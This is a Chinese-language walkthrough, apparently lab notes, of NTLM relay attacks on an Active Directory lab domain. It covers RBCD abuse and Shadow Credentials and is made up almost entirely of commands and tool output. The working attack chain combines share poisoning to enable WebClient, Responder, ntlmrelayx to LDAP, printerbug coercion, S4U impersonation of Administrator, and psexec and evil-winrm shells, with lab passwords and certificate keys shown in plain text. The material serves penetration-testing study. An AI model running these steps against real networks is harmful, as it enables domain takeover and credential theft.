针对 Kerberos 的NTLM 中继攻击
1. Kerberos RBCD Abuse
RBCD
默认情况下,计算机可以编辑自己的 msDS-AllowedToActOnBehalfOfOtherIdentity 属性
如果我们能够强迫目标计算机执行 NTLM 身份验证并通过 LDAP 将其中继到 DC,我们就可以编辑其 msDS-AllowedToActOnBehalfOfOtherIdentity 属性并添加我们想要的值。
因为DC默认强制开启会话签名,所以我们需要强制目标通过HTTP协议的NTLM身份验证,而不是默认的SMB(因为HTTP不存在会话签名),但是如果域控存在CVE-2019-1040漏洞,可以使用ntlmrelayx的--remove-mic参数中继SMB协议的NTLM身份认证到DC的LDAP服务
1.1. 枚举
1.1.1. 强制开启webClient
首先使用 nxc 的 drop-sc 模块对共享文件夹 \\DC01\Testing 和 \\DC01\smb 进行强制操作,从而强制 SQL01 和 WS01 启用 WebClient 服务
crackmapexec smb 172.16.117.3 -u anonymous -p '' -M drop-sc -o URL=https://172.16.117.30/testing FILENAME=@secret
[*] Ignore OPSEC in configuration is set and OPSEC unsafe module loaded
SMB 172.16.117.3 445 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:INLANEFREIGHT.LOCAL) (signing:True) (SMBv1:False)
SMB 172.16.117.3 445 DC01 [+] INLANEFREIGHT.LOCAL\anonymous:
DROP-SC 172.16.117.3 445 DC01 [+] Found writable share: smb
DROP-SC 172.16.117.3 445 DC01 [+] [OPSEC] Created @secret.searchConnector-ms file on the smb share
DROP-SC 172.16.117.3 445 DC01 [+] Found writable share: Testing
DROP-SC 172.16.117.3 445 DC01 [+] [OPSEC] Created @secret.searchConnector-ms file on the Testing share
crackmapexec smb 172.16.117.0/24 -u plaintext$ -p o6@ekK5#rlw2rAe -M webdav
SMB 172.16.117.3 445 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:INLANEFREIGHT.LOCAL) (signing:True) (SMBv1:False)
SMB 172.16.117.50 445 WS01 [*] Windows 10.0 Build 17763 x64 (name:WS01) (domain:INLANEFREIGHT.LOCAL) (signing:False) (SMBv1:False)
SMB 172.16.117.60 445 SQL01 [*] Windows 10.0 Build 17763 x64 (name:SQL01) (domain:INLANEFREIGHT.LOCAL) (signing:False) (SMBv1:False)
SMB 172.16.117.3 445 DC01 [+] INLANEFREIGHT.LOCAL\plaintext$:o6@ekK5#rlw2rAe
SMB 172.16.117.50 445 WS01 [+] INLANEFREIGHT.LOCAL\plaintext$:o6@ekK5#rlw2rAeWEBDAV 172.16.117.50 445 WS01 WebClient Service enabled on: 172.16.117.50SMB 172.16.117.60 445 SQL01 [+] INLANEFREIGHT.LOCAL\plaintext$:o6@ekK5#rlw2rAeWEBDAV 172.16.117.60 445 SQL01 WebClient Service enabled on: 172.16.117.601.2. 攻击
1.2.1. Responder配置
python3 Responder.py -I ens192
__
.----.-----.-----.-----.-----.-----.--| |.-----.----.
| _| -__|__ --| _ | _ | | _ || -__| _|
|__| |_____|_____| __|_____|__|__|_____||_____|__|
|__|
NBT-NS, LLMNR & MDNS Responder 3.1.3.0
<SNIP>
[+] Poisoners:
LLMNR [ON]
NBT-NS [ON]
MDNS [ON]
DNS [ON]
DHCP [OFF]
[+] Servers:
HTTP server [OFF]
HTTPS server [ON]
WPAD proxy [OFF]
Auth proxy [OFF]
SMB server [OFF]
<SNIP>
因为我们要中继HTTP和SMB,务必确保 SMB 和 HTTP 服务器均设置为 Off(关闭),这样在对 SQL01$ 进行身份验证强制时,我们才能顺利接收到 HTTP NTLM 身份验证请求:
1.2.2. ntlmrelayx中继
然后启动 ntlmrelayx以域控制器(172.16.117.3)的 LDAPS(或 LDAP)服务为目标,并使用 --delegate-access 选项来执行 RBCD攻击。
接着使用 --escalate-user 选项,并指定我们想要设置到 SQL01$ 的 msDS-AllowedToActOnBehalfOfOtherIdentity 属性中的计算机账户。
ntlmrelayx.py -t ldaps://INLANEFREIGHT\\'SQL01$'@172.16.117.3 --delegate-access --escalate-user 'plaintext$' --no-smb-server --no-dump
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client SMTP loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client RPC loaded..
[*] Protocol Client MSSQL loaded..
[*] Protocol Client DCSYNC loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client LDAP loaded..
[*] Running in relay mode to single host
[*] Setting up HTTP Server on port 80
[*] Setting up WCF Server
[*] Setting up RAW Server on port 6666
[*] Servers started, waiting for connections
1.2.3. 强制目标发起身份认证
使用printerbug.py强制 SQL01$ 对我们的攻击机执行 HTTP NTLM 身份验证
python3 printerbug.py inlanefreight/plaintext$:'o6@ekK5#rlw2rAe'@172.16.117.60 LINUX01@80/print
[*] Impacket v0.11.0 - Copyright 2023 Fortra
[*] Attempting to trigger authentication via rprn RPC at 172.16.117.60
[*] Bind OK
[*] Got handle
RPRN SessionError: code: 0x6ba - RPC_S_SERVER_UNAVAILABLE - The RPC server is unavailable.
[*] Triggered RPC backconnect, this may or may not have worked
ntlmrelayx 将通过 LDAPS 转发 HTTP NTLM 身份验证
[*] HTTPD(80): Connection from INLANEFREIGHT/SQL01$@172.16.117.60 controlled, attacking target ldaps://INLANEFREIGHT\SQL01$@172.16.117.3
[*] HTTPD(80): Authenticating against ldaps://INLANEFREIGHT\SQL01$@172.16.117.3 as INLANEFREIGHT/SQL01$ SUCCEED
[*] Enumerating relayed user's privileges. This may take a while on large domains
[*] Delegation rights modified succesfully!
[*] plaintext$ can now impersonate users on SQL01$ via S4U2Proxy[*] All targets processed!
1.2.4. 获取tgt
然后使用impacket-getST申请一个TGS
getST.py -spn cifs/sql01.inlanefreight.local -impersonate Administrator -dc-ip 172.16.117.3 "INLANEFREIGHT"/"plaintext$":"o6@ekK5#rlw2rAe"
Impacket v0.11.0 - Copyright 2023 Fortra
[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating Administrator
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in Administrator.ccache
1.2.5. psexec
KRB5CCNAME=Administrator.ccache psexec.py -k -no-pass sql01.inlanefreight.local
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Requesting shares on sql01.inlanefreight.local.....
[*] Found writable share ADMIN$
[*] Uploading file MpAADkGH.exe
[*] Opening SVCManager on sql01.inlanefreight.local.....
[*] Creating service pVuJ on sql01.inlanefreight.local.....
[*] Starting service pVuJ.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.2628]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami
nt authority\system
这种攻击存在其他变体,并且可以使用其他工具进行攻击; Mor Davidovich 发布的 DavRelayUp 可以在本地执行相同的攻击,而无需将 ST 导出到远程计算机并使用它。
2. Shadow Credentials
如果我们获取到了一个有对其他目标有高权限ACLs的对象,那么我们通常可以利用下面的方式
- 重置帐户密码
- 窃取账户的 NTLMv2 哈希值并尝试离线破解
但在实际中,这些技术(特别是重置密码)会产生较大的噪音,这里可以利用Shadow Credentials来接管此用户,相关文章请看这里
Shadow Credentials 攻击实际上是向账户添加备用凭证,使攻击者能够获取目标密钥转移 (TGT),进而获取 user / computer 的 NTLM 哈希值。即使 user / computer 更改密码, Shadow Credentials 仍然存在。
2.1. 攻击
此攻击要求域环境支持使用 PKINIT(使用 X.509 证书的 Kerberos 预身份验证机制),这通常在安装了AD证书服务或其他内部公钥基础设施(PKI)的情况下是可行的。
2.1.1. responder毒化
运行 Responder ,并将 HTTP 服务器设置为 Off
python3 Responder.py -I ens192
.----.-----.-----.-----.-----.-----.--| |.-----.----.
| _| -__|__ --| _ | _ | | _ || -__| _|
|__| |_____|_____| __|_____|__|__|_____||_____|__|
|__|
NBT-NS, LLMNR & MDNS Responder 3.1.3.0
<SNIP>
[+] Servers:
HTTP server [OFF]
HTTPS server [ON]
WPAD proxy [OFF]
Auth proxy [OFF]
SMB server [ON]
Kerberos server [ON]
<SNIP>
2.1.2. ntlmrelayx中继
ntlmrelayx.py -t ldap://INLANEFREIGHT\\CJAQ@172.16.117.3 --shadow-credentials --shadow-target jperez --no-da --no-dump --no-acl --no-smb-server
Impacket v0.11.0 - Copyright 2023 Fortra
<SNIP>
[*] Servers started, waiting for connections
--shadow-credentials:尝试进行Shadow Credentials攻击--shadow-target:设置KeyCredentialLink属性的帐户
ntlmrelayx.py -t ldap://INLANEFREIGHT\\CJAQ@172.16.117.3 --shadow-credentials --shadow-target jperez --no-da --no-dump --no-acl --no-smb-server
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Servers started, waiting for connections
[*] Setting up RAW Server on port 6666
[*] HTTPD(80): Client requested path: /xml;
[*] HTTPD(80): Connection from INLANEFREIGHT/CJAQ@172.16.117.60 controlled, attacking target ldap://INLANEFREIGHT\CJAQ@172.16.117.3
[*] HTTPD(80): Client requested path: /i0t823yj4q
[*] HTTPD(80): Authenticating against ldap://INLANEFREIGHT\CJAQ@172.16.117.3 as INLANEFREIGHT/CJAQ SUCCEED
[*] Enumerating relayed user's privileges. This may take a while on large domains
[*] All targets processed!
[*] Searching for the target account
[*] Target user found: CN=Jeffry Perez,CN=Users,DC=INLANEFREIGHT,DC=LOCAL
[*] Generating certificate
[*] Certificate generated
[*] Generating KeyCredential
[*] KeyCredential generated with DeviceID: 0e7ed4f1-1a8f-180b-cb7a-602f765c9cc6
[*] Updating the msDS-KeyCredentialLink attribute of jperez
[*] Updated the msDS-KeyCredentialLink attribute of the target object
[*] Saved PFX (#PKCS12) certificate & key at path: rbnYdUv8.pfx[*] Must be used with password: NRzoep723H6Yfc0pY91Z
[*] A TGT can now be obtained with https://github.com/dirkjanm/PKINITtools
[*] Run the following command to obtain a TGT
[*] python3 PKINITtools/gettgtpkinit.py -cert-pfx rbnYdUv8.pfx -pfx-pass NRzoep723H6Yfc0pY91Z INLANEFREIGHT.LOCAL/jperez rbnYdUv8.ccache
然后就会保存一个pfx文件
2.1.3. 获取TGT
使用 PKINITtools 中的 gettgtpkinit.py 获取TGT
python3 gettgtpkinit.py -cert-pfx rbnYdUv8.pfx -pfx-pass NRzoep723H6Yfc0pY91Z INLANEFREIGHT.LOCAL/jperez jperez.ccache
2023-07-31 13:24:29,645 minikerberos INFO Loading certificate and key from file
INFO:minikerberos:Loading certificate and key from file
2023-07-31 13:24:29,666 minikerberos INFO Requesting TGT
INFO:minikerberos:Requesting TGT
2023-07-31 13:24:29,695 minikerberos INFO AS-REP encryption key (you might need this later):
INFO:minikerberos:AS-REP encryption key (you might need this later):
2023-07-31 13:24:29,696 minikerberos INFO 6bbf39c678fc71c1272a12379620345da082382c3b253af51a65ccc2204e8184
INFO:minikerberos:6bbf39c678fc71c1272a12379620345da082382c3b253af51a65ccc2204e8184
2023-07-31 13:24:29,700 minikerberos INFO Saved TGT to file
INFO:minikerberos:Saved TGT to file
KRB5CCNAME=jperez.ccache evil-winrm -i dc01.inlanefreight.local -r INLANEFREIGHT.LOCAL
Evil-WinRM shell v3.5
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\jperez\Documents> whoami
inlanefreight\jperez